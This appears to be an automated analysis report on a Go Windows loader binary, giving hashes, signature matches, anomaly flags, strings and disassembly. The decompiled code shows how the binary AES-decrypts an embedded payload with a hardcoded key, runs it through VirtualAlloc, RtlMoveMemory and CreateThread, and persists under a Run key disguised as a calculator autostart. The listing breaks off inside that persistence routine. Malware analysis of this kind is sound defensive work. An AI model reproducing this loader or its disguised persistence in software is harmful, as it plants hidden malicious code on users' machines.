File Information hashes and primary classification
File name
5
File size
1.3 MiB
Architecture
X64
- MD5
- 070a44cbc28301098463b40b9b3f21d4
- SHA1
- 4d6f008d5c63103f23643722550b4d4fc805368a
- SHA256
- fa755134d9c9796b2f58fd61aeb0ef12121da6afaa1943f05334d332992cdff5
- TLSH
- T141553a877cc115b9d0ba923188a612417b21fc661f3663d72b61b6f82f7bbd44e35328
- Imphash
- f0ea7b7844bbc5bfa9bb32efdcea957c
- Rich header
- -
Metadata parser-extracted fields
YARA Signatures 2 matching rules
Type.UNCOMMON
fingerprint
EnumerateProcesses
Type.INFO
compiler
Golang
Kesakode similarity verdict
Leslieloader
3.8%
0 malware hits
854 library hits
1217 clean hits
Anomalies signals worth reviewing
entropy:
BigBufferNoXrefMediumToHighEntropy
strings:
DynamicString
headers:
GuiSubsystemNoWindowApi
code:
HighXrefLoopingFunction
ManyHighValueImmediates
ManyUniqueImmediateBytes
SequentialFunction
SpaghettiFunction
XorInLoop
sections:
InvalidSizeOfInitializedData
UnbalancedVirtualPhysicalRatio
integrity:
NoChecksum
time:
TimeDateStampZero
Constants identified constants and patterns
crypto:
AES_Rijndael_S___ARIA_S1__8_byt_256
1
AES_Rijndael_Si___ARIA_X1__8_byt_256
1
Rijndael_Td0__0x51f4a750U___32_lil_1024
1
Rijndael_Td1__0x5051f4a7U___32_lil_1024
1
Rijndael_Td2__0xa75051f4U___32_lil_1024
1
Rijndael_Td3__0xf4a75051U___32_lil_1024
1
registry:
HKEY_CURRENT_USER
3
HKEY_USERS
2
autorun
1
Strings highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x427F49 | 010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000... | 1 | BINARY | 209 |
| 0x41F26B | 9A9999999999D53F00000000006A48410000000065CDCD41FCA9F1D24D62503F0000000000408F40 | 1 | BINARY | 204 |
| 0x49C0FD | Software\Microsoft\Windows\CurrentVersion\Run | 1 | ASCII | 167 |
| 0x42EAC9 | PowerRegisterSuspendResumeNotification | 1 | ASCII | 158 |
| 0x42E44F | AddVectoredContinueHandler | 1 | ASCII | 154 |
| 0x42F53D | QueryPerformanceFrequency | 1 | ASCII | 152 |
| 0x49D556 | runtime: warning: IsLongPathAwareProcess failed to enable long paths; proceeding in fixup mode\n | 1 | ASCII | 150 |
| 0x42F475 | GetSystemTimeAsFileTime | 1 | ASCII | 149 |
| 0x49D500 | QueryPerformanceFrequency overflow 32 bit divider, check nosplit discussion to proceed | 1 | ASCII | 148 |
| 0x533440 | !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;... | 7 | ASCII | 146 |
| 0x49D5B5 | 000102030405060708091011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575... | 3 | ASCII | 146 |
| 0x49D4B0 | QueryPerformanceFrequency syscall returned zero, running on unsupported hardware | 1 | ASCII | 146 |
| 0x42F4DB | QueryPerformanceCounter | 1 | ASCII | 146 |
| 0x42E974 | wine_get_version | 1 | ASCII | 145 |
| 0x42E6EF | RtlGetCurrentPeb | 1 | ASCII | 145 |
| 0x42E75D | RtlGetNtVersionNumbers | 1 | ASCII | 145 |
| 0x49D29B | runtime: internal error: misuse of lockOSThread/unlockOSThread | 1 | ASCII | 144 |
| 0x49D16A | runtime: GetQueuedCompletionStatusEx returned invalid mode= | 1 | ASCII | 144 |
| 0x49D398 | runtime.SetFinalizer: pointer not at beginning of allocated block | 1 | ASCII | 143 |
| 0x49CE22 | gcControllerState.findRunnable: blackening not enabled | 1 | ASCII | 143 |
| 0x49CBE4 | runtime: netpoll: PostQueuedCompletionStatus failed | 1 | ASCII | 143 |
| 0x42E8FF | WSAGetOverlappedResult | 1 | ASCII | 143 |
| 0x49421D | /dev/stderr | 1 | ASCII | 143 |
| 0x49D358 | runtime.SetFinalizer: first argument was allocated into an arena | 1 | ASCII | 142 |
| 0x49D2D9 | malformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit` | 1 | ASCII | 142 |
| 0x49D0B9 | runtime: checkmarks found unexpected unmarked object obj= | 1 | ASCII | 142 |
| 0x49D25D | limiterEvent.stop: found wrong event in p's limiter event slot | 1 | ASCII | 141 |
| 0x49D12E | manual span allocation called with non-manually-managed type | 1 | ASCII | 141 |
| 0x49CF69 | mheap.freeSpanLocked - invalid free of user arena chunk | 1 | ASCII | 141 |
| 0x49CEFB | casfrom_Gscanstatus:top gp->status is not in scan state | 1 | ASCII | 141 |
| 0x49CCE7 | runtime.SetFinalizer: pointer not in allocated block | 1 | ASCII | 141 |
| 0x49CC7F | casfrom_Gscanstatus: gp->status is not in scan state | 1 | ASCII | 141 |
| 0x49CD4F | runtime: use of FixAlloc_Alloc before FixAlloc_Init\n | 1 | ASCII | 141 |
| 0x49CB7E | limiterEvent.stop: invalid limiter event type found | 1 | ASCII | 141 |
| 0x49CBB1 | potentially overlapping in-use allocations detected | 1 | ASCII | 141 |
| 0x49CB4B | fatal: systemstack called from unexpected goroutine | 1 | ASCII | 141 |
| 0x495629 | 0123456789abcdef | 2 | ASCII | 141 |
| 0x49D010 | profilealloc called without a P or outside bootstrapping | 1 | ASCII | 140 |
| 0x49CF32 | gentraceback callback cannot be used with non-zero skip | 1 | ASCII | 140 |
| 0x49CCB3 | mallocgc called without a P or outside bootstrapping | 1 | ASCII | 140 |
| 0x49C7A7 | runtime.preemptM: duplicatehandle failed; errno= | 1 | ASCII | 140 |
| 0x49BD9A | gcBgMarkWorker: unexpected gcMarkWorkerMode | 1 | ASCII | 140 |
| 0x42E686 | NtWaitForSingleObject | 1 | ASCII | 140 |
| 0x494228 | /dev/stdout | 1 | ASCII | 140 |
| 0x49CFA0 | failed to allocate aligned heap memory; too many retries | 1 | ASCII | 139 |
| 0x49CD1B | runtime: GetQueuedCompletionStatusEx failed (errno= | 1 | ASCII | 139 |
| 0x49CD83 | span set block with unpopped elements found in reset | 1 | ASCII | 139 |
| 0x49CAE7 | recursive call during initialization - linker skew | 1 | ASCII | 139 |
| 0x49CAB5 | mallocgc called with gcphase == _GCmarktermination | 1 | ASCII | 139 |
| 0x49CA20 | sweeper left outstanding across sweep generations | 1 | ASCII | 139 |
| 0x49C95C | panicwrap: unexpected string after package name: | 1 | ASCII | 139 |
| 0x49C867 | casgstatus: waiting for Gwaiting but is Grunnable | 1 | ASCII | 139 |
| 0x49C747 | CreateWaitableTimerEx when creating timer failed | 1 | ASCII | 139 |
| 0x49C807 | runtime: waitforsingleobject wait_failed; errno= | 1 | ASCII | 139 |
| 0x49C718 | tried to sleep scavenger from another goroutine | 1 | ASCII | 139 |
| 0x49C6BA | runtime: CreateIoCompletionPort failed (errno= | 1 | ASCII | 139 |
| 0x49C62D | finishGCTransition called without starting one? | 1 | ASCII | 139 |
| 0x49C48B | signal arrived during external code execution\n | 1 | ASCII | 139 |
| 0x49C31B | memory reservation exceeds address space limit | 1 | ASCII | 139 |
| 0x49C1B1 | runtime.minit: duplicatehandle failed; errno= | 1 | ASCII | 139 |
| 0x49C021 | gcmarknewobject called while doing checkmark | 1 | ASCII | 139 |
| 0x49BF9E | unknown runnable goroutine during bootstrap | 1 | ASCII | 139 |
| 0x4979EC | CalculatorApp_AutoStart | 1 | ASCII | 139 |
| 0x49D3D9 | user arena chunk size is not a mutliple of the physical page size | 1 | ASCII | 138 |
| 0x49D21F | found bad pointer in Go heap (incorrect use of unsafe or cgo?) | 1 | ASCII | 138 |
| 0x49CEC4 | is currently not supported for use in system callbacks | 1 | ASCII | 138 |
| 0x49CE58 | no goroutines (main called runtime.Goexit) - deadlock! | 1 | ASCII | 138 |
| 0x49CB19 | runtime: unable to acquire - semaphore out of sync | 1 | ASCII | 138 |
| 0x49C98D | runtime: unexpected waitm - semaphore out of sync | 1 | ASCII | 138 |
| 0x49C8C9 | fully empty unfreed span set block found in reset | 1 | ASCII | 138 |
| 0x49C7D7 | runtime: waitforsingleobject unexpected; result= | 1 | ASCII | 138 |
| 0x49C377 | released less than one physical page of memory | 1 | ASCII | 138 |
| 0x49C543 | tried to park scavenger from another goroutine | 1 | ASCII | 138 |
| 0x49C349 | panicwrap: unexpected string after type name: | 1 | ASCII | 138 |
| 0x49C265 | tried to run scavenger from another goroutine | 1 | ASCII | 138 |
| 0x49B946 | markWorkerStop: unknown mark worker mode | 1 | ASCII | 138 |
| 0x49B9E6 | runtime.preemptM: duplicatehandle failed | 1 | ASCII | 138 |
| 0x49B34C | _cgo_notify_runtime_init_done missing | 1 | ASCII | 138 |
| 0x42E5E7 | SystemFunction036 | 1 | ASCII | 138 |
| 0x49D080 | gentraceback cannot trace user goroutine on its own stack | 1 | ASCII | 137 |
| 0x49C898 | delayed zeroing on data that may contain pointers | 1 | ASCII | 137 |
| 0x49C777 | could not find GetSystemTimeAsFileTime() syscall | 1 | ASCII | 137 |
| 0x49C68B | racy sudog adjustment due to parking on channel | 1 | ASCII | 137 |
| 0x49C5FE | failed to acquire lock to start a GC transition | 1 | ASCII | 137 |
| 0x49C42F | runtime: text offset base pointer out of range | 1 | ASCII | 137 |
| 0x49C401 | runtime: panic before malloc heap initialized\n | 1 | ASCII | 137 |
| 0x49C1DE | runtime: CreateWaitableTimerEx failed; errno= | 1 | ASCII | 137 |
| 0x49C157 | exitsyscall: syscall frame is no longer valid | 1 | ASCII | 137 |
| 0x49C238 | transitioning GC to the same state as before? | 1 | ASCII | 137 |
| 0x49C20B | runtime: failed mSpanList.remove span.npages= | 1 | ASCII | 137 |
| 0x49C079 | out of memory allocating heap arena metadata | 1 | ASCII | 137 |
| 0x49C04D | no P available, write barriers are forbidden | 1 | ASCII | 137 |
| 0x49BF73 | unfinished open-coded defers in deferreturn | 1 | ASCII | 137 |
| 0x49BF48 | runtime:stoplockedm: lockedg (atomicstatus= | 1 | ASCII | 137 |
| 0x49BEC7 | runtime.SetFinalizer: first argument is nil | 1 | ASCII | 137 |
| 0x49BE9C | runtime.SetFinalizer: finalizer already set | 1 | ASCII | 137 |
| 0x49BBA5 | runtime: typeBitsBulkBarrier without type | 1 | ASCII | 137 |
| 0x49492E | iphlpapi.dll | 7 | ASCII | 137 |
| 0x493ECB | /dev/stdin | 1 | ASCII | 137 |
| 0x493D99 | ntdll.dll | 4 | ASCII | 137 |
| 0x49D0F2 | addr range base and limit are not in the same memory segment | 1 | ASCII | 136 |
| 0x49CA51 | attempt to execute system stack code on user stack | 1 | ASCII | 136 |
| 0x49C9BE | s.allocCount != s.nelems && freeIndex == s.nelems | 1 | ASCII | 136 |
| 0x49C571 | P has cached GC work at end of mark termination | 1 | ASCII | 136 |
| 0x49C65C | function symbol table not sorted by PC offset: | 1 | ASCII | 136 |
| 0x49C3D3 | runtime: name offset base pointer out of range | 1 | ASCII | 136 |
| 0x49BFC9 | active sweepers found at start of mark phase | 1 | ASCII | 136 |
| 0x49C0D1 | span on userArena.faultList has invalid size | 1 | ASCII | 136 |
| 0x49BF1D | runtime: releaseSudog with non-nil gp.param | 1 | ASCII | 136 |
| 0x49BE1B | methodValueCallFrameObjs is not in a module | 1 | ASCII | 136 |
| 0x49BE46 | non in-use span found with specials bit set | 1 | ASCII | 136 |
| 0x49BD1C | runtime: blocked write on closing polldesc | 1 | ASCII | 136 |
| 0x49BC9E | on a locked thread with no template thread | 1 | ASCII | 136 |
| 0x49B91E | invalid span in heapArena for user arena | 1 | ASCII | 136 |
| 0x49B746 | mspan.sweep: bad span state after sweep | 1 | ASCII | 136 |
| 0x49B809 | suspendG from non-preemptible goroutine | 1 | ASCII | 136 |
| 0x49B555 | cannot read stack of running goroutine | 1 | ASCII | 136 |
| 0x49B5ED | internal error: exit hook invoked exit | 1 | ASCII | 136 |
| 0x49B639 | makechan: invalid channel element type | 1 | ASCII | 136 |
| 0x49B405 | runtime.minit: duplicatehandle failed | 1 | ASCII | 136 |
| 0x49AF3C | persistentalloc: align is too large | 1 | ASCII | 136 |
| 0x407D3D | runtime error: | 1 | ASCII | 136 |
| 0x49D1A6 | runtime: netpoll: PostQueuedCompletionStatus failed (errno= | 2 | ASCII | 135 |
| 0x49C184 | produced a trigger greater than the heap goal | 1 | ASCII | 135 |
| 0x49C0A5 | runtime: lfstack.push invalid packing: node= | 1 | ASCII | 135 |
| 0x49BCC8 | out of memory allocating checkmarks bitmap | 1 | ASCII | 135 |
| 0x49BC4A | fatal error: cgo callback before cgo call\n | 1 | ASCII | 135 |
| 0x49BD46 | sweep: tried to preserve a user arena span | 1 | ASCII | 135 |
| 0x49BB7C | runtime: blocked read on closing polldesc | 1 | ASCII | 135 |
| 0x49BA86 | attempted to add zero-sized address range | 1 | ASCII | 135 |
| 0x49B8F6 | failed to acquire lock to reset capacity | 1 | ASCII | 135 |
| 0x49BA36 | runtime: out of memory: cannot allocate | 1 | ASCII | 135 |
| 0x49B996 | refill of span with free space remaining | 1 | ASCII | 135 |
| 0x49B6F8 | internal error: exit hook invoked panic | 1 | ASCII | 135 |
| 0x49B5A1 | gcBgMarkWorker: blackening not enabled | 1 | ASCII | 135 |
| 0x49B3E0 | internal error: unknown network type | 1 | ASCII | 135 |
| 0x49B09E | Unable to determine system directory | 1 | ASCII | 135 |
| 0x49B24E | runtime: wrong goroutine in newstack | 1 | ASCII | 135 |
| 0x49AE47 | attempt to clear non-empty span set | 1 | ASCII | 135 |
| 0x49ABC3 | stoplockedm: inconsistent locking | 1 | ASCII | 135 |
| 0x49C3A5 | runtime: failed to create new OS thread (have | 1 | ASCII | 134 |
| 0x49BDC5 | grew heap, but no adequate free space found | 1 | ASCII | 134 |
| 0x49BB2A | objects added out of order or overlapping | 1 | ASCII | 134 |
| 0x49B96E | must be able to track idle limiter event | 1 | ASCII | 134 |
| 0x49B76D | out of memory allocating heap arena map | 1 | ASCII | 134 |
| 0x49B4E3 | Unable to determine system directory: | 1 | ASCII | 134 |
| 0x49B474 | setprofilebucket: profile already set | 1 | ASCII | 134 |
| 0x49B10A | lfstack node allocated from the heap | 1 | ASCII | 134 |
| 0x49A971 | base outside usable address space | 1 | ASCII | 134 |
| 0x49ABA2 | stackalloc not on scheduler stack | 1 | ASCII | 134 |
| 0x49A3D2 | resetspinning: not a spinning m | 1 | ASCII | 134 |
| 0x499FE3 | checkdead: inconsistent counts | 1 | ASCII | 134 |
| 0x499D16 | string concatenation too long | 1 | ASCII | 134 |
| 0x49D1E2 | abiRegArgsType needs GC Prog, update methodValueCallFrameObjs | 2 | ASCII | 133 |
| 0x49BE71 | root level max pages doesn't fit in summary | 1 | ASCII | 133 |
| 0x49BB01 | mheap.freeSpanLocked - invalid stack free | 1 | ASCII | 133 |
| 0x49BAD8 | mheap.freeSpanLocked - invalid span state | 1 | ASCII | 133 |
| 0x49CFD8 | in gcMark expecting to see gcphase as _G | 1 | ASCII | 133 |
| 0x49B71F | mismatched count during itab table copy | 1 | ASCII | 133 |
| 0x49B7E2 | stack growth not allowed in system call | 1 | ASCII | 133 |
| 0x49B7BB | runtime: casfrom_Gscanstatus failed gp= | 1 | ASCII | 133 |
| 0x49B794 | runtime: blocked write on free polldesc | 1 | ASCII | 133 |
| 0x49B613 | m changed unexpectedly in cgocallbackg | 1 | ASCII | 133 |
| 0x49B6AB | unreachable method called. linker bug? | 1 | ASCII | 133 |
| 0x49B3BB | failed to reserve page summary memory | 1 | ASCII | 133 |
| 0x49B499 | startTheWorld: inconsistent mp->nextp | 1 | ASCII | 133 |
| 0x49B2DE | user arena span is on the wrong list | 1 | ASCII | 133 |
| 0x49B22A | runtime: unblock on closing polldesc | 1 | ASCII | 133 |
| 0x49B12E | runtime: VirtualQuery failed; errno= | 1 | ASCII | 133 |
| 0x49B0C2 | accessed data from freed user arena | 1 | ASCII | 133 |
| 0x49B032 | ) is not Grunnable or Gscanrunnable\n | 1 | ASCII | 133 |
| 0x49AEB0 | greyobject: obj not pointer-aligned | 1 | ASCII | 133 |
| 0x49ACD0 | doaddtimer: P already set in timer | 1 | ASCII | 133 |
| 0x49AC48 | Other_Default_Ignorable_Code_Point | 1 | ASCII | 133 |
| 0x49AAFD | runtime: name offset out of range | 1 | ASCII | 133 |
| 0x49AA37 | misrounded allocation in sysAlloc | 1 | ASCII | 133 |
| 0x49A86B | sweep increased allocation count | 1 | ASCII | 133 |
| 0x49A6AB | runtime: mcall function returned | 1 | ASCII | 133 |
| 0x49A60B | removespecial on invalid pointer | 1 | ASCII | 133 |
| 0x499FA7 | abi mismatch detected between | 1 | ASCII | 133 |
| 0x499562 | Prepended_Concatenation_Mark | 1 | ASCII | 133 |
| 0x49975A | missing stack in shrinkstack | 1 | ASCII | 133 |
| 0x499370 | sigsend: inconsistent state | 1 | ASCII | 133 |
| 0x49C4E7 | stopTheWorld: not stopped (status != _Pgcstop) | 1 | ASCII | 132 |
| 0x49BAAF | gcSweep being done but phase is not GCoff | 1 | ASCII | 132 |
| 0x49B685 | runtime: sudog with non-false isSelect | 1 | ASCII | 132 |
| 0x49B65F | runtime: blocked read on free polldesc | 1 | ASCII | 132 |
| 0x49B2BA | uncaching span but s.allocCount == 0 | 1 | ASCII | 132 |
| 0x49B206 | runtime: sudog with non-nil waitlink | 1 | ASCII | 132 |
| 0x49B272 | startm: P required for spinning=true | 1 | ASCII | 132 |
| 0x49AE8D | findrunnable: netpoll with spinning | 1 | ASCII | 132 |
| 0x49AFC8 | traceback did not unwind completely | 1 | ASCII | 132 |
| 0x49AD7A | runtime: g is running but p is not | 1 | ASCII | 132 |
| 0x49AD36 | out of memory allocating allArenas | 1 | ASCII | 132 |
| 0x49A9F5 | freeing stack not in a stack span | 1 | ASCII | 132 |
| 0x49AB1E | runtime: text offset out of range | 1 | ASCII | 132 |
| 0x49A58B | end outside usable address space | 1 | ASCII | 132 |
| 0x49A64B | runtime.semasleep wait_abandoned | 1 | ASCII | 132 |
| 0x49A7CB | scavenger state is already wired | 1 | ASCII | 132 |
| 0x49A7AB | scanstack: goroutine not stopped | 1 | ASCII | 132 |
| 0x49A2BB | bad write barrier buffer bounds | 1 | ASCII | 132 |
| 0x49A394 | non in-use span in unswept list | 1 | ASCII | 132 |
| 0x499706 | gcstopm: negative nmspinning | 1 | ASCII | 132 |
| 0x499626 | [originating from goroutine | 1 | ASCII | 132 |
| 0x499103 | address not a stack address | 1 | ASCII | 132 |
| 0x498DEB | entersyscall inconsistent | 1 | ASCII | 132 |
| 0x49451F | shell32.dll | 4 | ASCII | 132 |
| 0x49CE8E | runtime: signal received on thread not created by Go.\n | 3 | ASCII | 131 |
| 0x49C2BF | (bad use of unsafe.Pointer? try -d=checkptr)\n | 1 | ASCII | 131 |
| 0x49BC20 | acquireSudog: found s.elem != nil in cache | 1 | ASCII | 131 |
| 0x49B8CE | cannot free workbufs when work.full != 0 | 1 | ASCII | 131 |
| 0x49B371 | all goroutines are asleep - deadlock! | 1 | ASCII | 131 |
| 0x49B176 | runtime: invalid pc-encoded table f= | 1 | ASCII | 131 |
| 0x49AF82 | runtime: close polldesc w/o unblock | 1 | ASCII | 131 |
| 0x49AED3 | mheap.freeSpanLocked - invalid free | 1 | ASCII | 131 |
| 0x49AEF6 | mismatched begin/end of activeSweep | 1 | ASCII | 131 |
| 0x49AC8C | VirtualQuery for stack base failed | 1 | ASCII | 131 |
| 0x49ABE4 | timer period must be non-negative | 1 | ASCII | 131 |
| 0x49AB3F | runtime: type offset out of range | 1 | ASCII | 131 |
| 0x49AA79 | runtime: failed mSpanList.insert | 1 | ASCII | 131 |
| 0x49A5AB | invalid limiter event type found | 1 | ASCII | 131 |
| 0x49A54B | " not supported for cpu option " | 1 | ASCII | 131 |
| 0x499D8B | in prepareForSweep; sweepgen | 1 | ASCII | 131 |
| 0x499A24 | addspecial on invalid pointer | 1 | ASCII | 131 |
| 0x499262 | mspan.sweep: bad span state | 1 | ASCII | 131 |
| 0x495959 | castogscanstatus | 1 | ASCII | 131 |
| 0x4946A6 | CreateThread | 1 | ASCII | 131 |
| 0x49493A | kernel32.dll | 12 | ASCII | 131 |
| 0x494862 | advapi32.dll | 11 | ASCII | 131 |
| 0x4B1C50 | 333333 | 1 | ASCII | 131 |
| 0x49C8FA | invalid memory address or nil pointer dereference | 4 | ASCII | 130 |
| 0x49BD70 | unexpected signal during runtime execution | 2 | ASCII | 130 |
| 0x49BBCE | stopTheWorld: not stopped (stopwait != 0) | 1 | ASCII | 130 |
| 0x49B830 | traceback: unexpected SPWRITE function | 1 | ASCII | 130 |
| 0x49B44F | runtime: unexpected SPWRITE function | 1 | ASCII | 130 |
| 0x49B1BE | runtime: marked free object in span | 1 | ASCII | 130 |
| 0x49B1E2 | runtime: mcall called on m->g0 stack | 1 | ASCII | 130 |
| 0x49AD9C | schedule: spinning with local work | 1 | ASCII | 130 |
| 0x49AA9A | runtime: failed to decommit pages | 1 | ASCII | 130 |
| 0x49A74B | runtime: sudog with non-nil elem | 1 | ASCII | 130 |
| 0x49A70B | runtime: setevent failed; errno= | 1 | ASCII | 130 |
| 0x49A66B | runtime: failed to release pages | 1 | ASCII | 130 |
| 0x49A318 | casgstatus: bad incoming values | 1 | ASCII | 130 |
| 0x49A375 | internal error - misuse of itab | 1 | ASCII | 130 |
| 0x49A0B5 | runqputslow: queue is not full | 1 | ASCII | 130 |
| 0x499D33 | timeBegin/EndPeriod not found | 1 | ASCII | 130 |
| 0x499BD7 | runtime.semasleep wait_failed | 1 | ASCII | 130 |
| 0x499802 | runtime.semasleep unexpected | 1 | ASCII | 130 |
| 0x498F71 | startlockedm: locked to me | 1 | ASCII | 130 |
| 0x498FA5 | wakep: negative nmspinning | 1 | ASCII | 130 |
| 0x498F57 | shrinking stack in libcall | 1 | ASCII | 130 |
| 0x498935 | missing stack in newstack | 1 | ASCII | 130 |
| 0x49C45D | runtime: type offset base pointer out of range | 2 | ASCII | 129 |
| 0x49B8A6 | bulkBarrierPreWrite: unaligned arguments | 2 | ASCII | 129 |
| 0x49AF5F | pidleput: P has non-empty run queue | 1 | ASCII | 129 |
| 0x49AD14 | mspan.ensureSwept: m is not locked | 1 | ASCII | 129 |
Functions high-value functions
Function listings
0x47BE20 main str 6 api 0 imm 18 Unknown
main.main() {
cmp rsp, [r14+0x10]
jbe .2
add rsp, 0xFFFFFFFFFFFFFF80
mov [rsp+0x78], rbp
lea rbp, [rsp+0x78]
call main.enableAutoStart()
lea rax, [0x484640]
call runtime.newobject()
mov rdi, rax
lea rsi, [0x4B4FA8]
mov ecx, 0x4ACC
rep movsq
mov ebx, 0x25660
mov rcx, rbx
lea rdi, ["1ws12uuu11j*p5fr"]
mov esi, 0x10
call main.AesDecryptByECB()
mov [rsp+0x48], rax
mov [rsp+0x30], rbx
lea rax, ["kernel32.dll"]
mov ebx, 0x0C
call syscall.MustLoadDLL()
mov [rsp+0x40], rax
lea rbx, ["VirtualAlloc"]
mov ecx, 0x0C
call syscall.(*DLL).MustFindProc()
mov [rsp+0x58], rax
lea rbx, ["RtlMoveMemory"]
mov ecx, 0x0D
mov rax, [rsp+0x40]
nop [rax+rax*1], eax
call syscall.(*DLL).MustFindProc()
mov [rsp+0x60], rax
lea rbx, ["CreateThread"]
mov ecx, 0x0C
mov rax, [rsp+0x40]
nop [rax+rax*1], eax
call syscall.(*DLL).MustFindProc()
mov [rsp+0x68], rax
lea rbx, ["WaitForSingleObject"]
mov ecx, 0x13
mov rax, [rsp+0x40]
nop [rax+rax*1], eax
call syscall.(*DLL).MustFindProc()
mov [rsp+0x50], rax
lea rax, [0x484B20]
call runtime.newobject()
mov rcx, [rsp+0x30]
mov [rax+0x08], rcx
mov qword ptr [rax+0x10], 0x3000
mov qword ptr [rax+0x18], 0x40
mov rbx, rax
mov edi, 0x04
mov rax, [rsp+0x58]
mov rcx, rdi
nop
call syscall.(*Proc).Call()
mov rcx, [rsp+0x30]
test rcx, rcx
jbe .1
mov [rsp+0x38], rax
mov rcx, [rsp+0x48]
mov [rsp+0x70], rcx
lea rax, [0x484A60]
call runtime.newobject()
mov rcx, [rsp+0x38]
mov [rax], rcx
mov rdx, [rsp+0x70]
mov [rax+0x08], rdx
mov rdx, [rsp+0x30]
mov [rax+0x10], rdx
mov rbx, rax
mov edi, 0x03
mov rax, [rsp+0x60]
mov rcx, rdi
call syscall.(*Proc).Call()
lea rax, [0x484C40]
call runtime.newobject()
mov rcx, [rsp+0x38]
mov [rax+0x10], rcx
movups [rax+0x18], xmm15
mov qword ptr [rax+0x28], 0x00
mov rbx, rax
mov ecx, 0x06
mov rdi, rcx
mov rax, [rsp+0x68]
call syscall.(*Proc).Call()
mov [rsp+0x28], rax
lea rax, [0x484940]
call runtime.newobject()
mov rcx, [rsp+0x28]
mov [rax], rcx
mov qword ptr [rax+0x08], 0xFFFFFFF
mov rbx, rax
mov ecx, 0x02
mov rdi, rcx
mov rax, [rsp+0x50]
call syscall.(*Proc).Call()
mov rax, [rsp+0x40]
call syscall.(*DLL).Release()
mov rbp, [rsp+0x78]
sub rsp, 0xFFFFFFFFFFFFFF80
ret
.1:
xor eax, eax
mov rcx, rax
call runtime.panicIndex()
nop
.2:
call runtime.morestack_noctxt()
jmp main.main()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void main.main(void)
{
undefined8 *puVar1;
undefined8 uVar2;
undefined8 *puVar3;
int64_t iVar4;
undefined *puVar5;
undefined *unaff_RBP;
undefined8 *puVar6;
int64_t unaff_R14;
uint8_t uVar7;
undefined in_XMM15 [16];
undefined auVar8 [16];
uVar7 = 0;
do {
puVar5 = register0x00000020;
if (*(unaff_R14 + 0x10) < register0x00000020) {
puVar5 = register0x00000020 + -0x80;
*(register0x00000020 + -8) = unaff_RBP;
unaff_RBP = register0x00000020 + -8;
*(register0x00000020 + -0x88) = 0x47be3d;
main.enableAutoStart();
*(register0x00000020 + -0x88) = 0x47be49;
puVar1 = runtime.newobject(0x484640);
puVar3 = 0x4b4fa8;
puVar6 = puVar1;
for (iVar4 = 0x4acc; iVar4 != 0; iVar4 = iVar4 + -1) {
*puVar6 = *puVar3;
puVar3 = puVar3 + uVar7 * -2 + 1;
puVar6 = puVar6 + uVar7 * -2 + 1;
}
*(register0x00000020 + -0x88) = 0x47be74;
auVar8 = main.AesDecryptByECB(puVar1, 0x25660, 0x25660, "1ws12uuu11j*p5fr", 0x10);
*(register0x00000020 + -0x38) = auVar8._0_8_;
*(register0x00000020 + -0x50) = auVar8._8_8_;
*(register0x00000020 + -0x88) = 0x47be8f;
uVar2 = syscall.MustLoadDLL("kernel32.dll", 0xc);
*(register0x00000020 + -0x40) = uVar2;
*(register0x00000020 + -0x88) = 0x47bea5;
uVar2 = syscall.(*DLL).MustFindProc(uVar2, "VirtualAlloc", 0xc);
*(register0x00000020 + -0x28) = uVar2;
*(register0x00000020 + -0x88) = 0x47bec5;
uVar2 = syscall.(*DLL).MustFindProc(*(register0x00000020 + -0x40), "RtlMoveMemory", 0xd);
*(register0x00000020 + -0x20) = uVar2;
*(register0x00000020 + -0x88) = 0x47bee5;
uVar2 = syscall.(*DLL).MustFindProc(*(register0x00000020 + -0x40), "CreateThread", 0xc);
*(register0x00000020 + -0x18) = uVar2;
*(register0x00000020 + -0x88) = 0x47bf05;
uVar2 = syscall.(*DLL).MustFindProc(*(register0x00000020 + -0x40), "WaitForSingleObject", 0x13);
*(register0x00000020 + -0x30) = uVar2;
*(register0x00000020 + -0x88) = 0x47bf16;
iVar4 = runtime.newobject(0x484b20);
*(iVar4 + 8) = *(register0x00000020 + -0x50);
*(iVar4 + 0x10) = 0x3000;
*(iVar4 + 0x18) = 0x40;
*(register0x00000020 + -0x88) = 0x47bf45;
auVar8 = syscall.(*Proc).Call(*(register0x00000020 + -0x28), iVar4, 4);
if (*(register0x00000020 + -0x50) != 0) {
*(register0x00000020 + -0x48) = auVar8._0_8_;
*(register0x00000020 + -0x10) = *(register0x00000020 + -0x38);
*(register0x00000020 + -0x88) = 0x47bf6e;
puVar3 = runtime.newobject(0x484a60);
*puVar3 = *(register0x00000020 + -0x48);
puVar3[1] = *(register0x00000020 + -0x10);
puVar3[2] = *(register0x00000020 + -0x50);
*(register0x00000020 + -0x88) = 0x47bf9d;
syscall.(*Proc).Call(*(register0x00000020 + -0x20), puVar3, 3);
*(register0x00000020 + -0x88) = 0x47bfa9;
iVar4 = runtime.newobject(0x484c40);
*(iVar4 + 0x10) = *(register0x00000020 + -0x48);
*(iVar4 + 0x18) = in_XMM15;
*(iVar4 + 0x28) = 0;
*(register0x00000020 + -0x88) = 0x47bfd4;
uVar2 = syscall.(*Proc).Call(*(register0x00000020 + -0x18), iVar4, 6, 6);
*(register0x00000020 + -0x58) = uVar2;
*(register0x00000020 + -0x88) = 0x47bfe5;
puVar3 = runtime.newobject(0x484940);
*puVar3 = *(register0x00000020 + -0x58);
puVar3[1] = 0xfffffff;
*(register0x00000020 + -0x88) = 0x47c00a;
syscall.(*Proc).Call(*(register0x00000020 + -0x30), puVar3, 2, 2);
*(register0x00000020 + -0x88) = 0x47c014;
syscall.(*DLL).Release(*(register0x00000020 + -0x40));
return;
}
*(register0x00000020 + -0x88) = 0x47c028;
runtime.panicIndex(0, auVar8._8_8_, 0);
}
*(puVar5 + -8) = 0x47c02e;
runtime.morestack_noctxt();
register0x00000020 = puVar5;
} while( true );
}
0x47B940 enableAutoStart str 2 api 0 imm 7 Unknown
main.enableAutoStart() {
cmp rsp, [r14+0x10]
jbe .4
sub rsp, 0x68
mov [rsp+0x60], rbp
lea rbp, [rsp+0x60]
mov r13, 0x00
mov [rsp+0x58], r13
mov byte ptr [rsp+0x37], 0x00
call os.Executable()
test rcx, rcx
jnz .3
nop
call path.filepath.abs()
nop [rax], eax
test rcx, rcx
jnz .2
mov [rsp+0x50], rax
mov [rsp+0x38], rbx
mov eax, 0x80000001
lea rbx, [autorun]
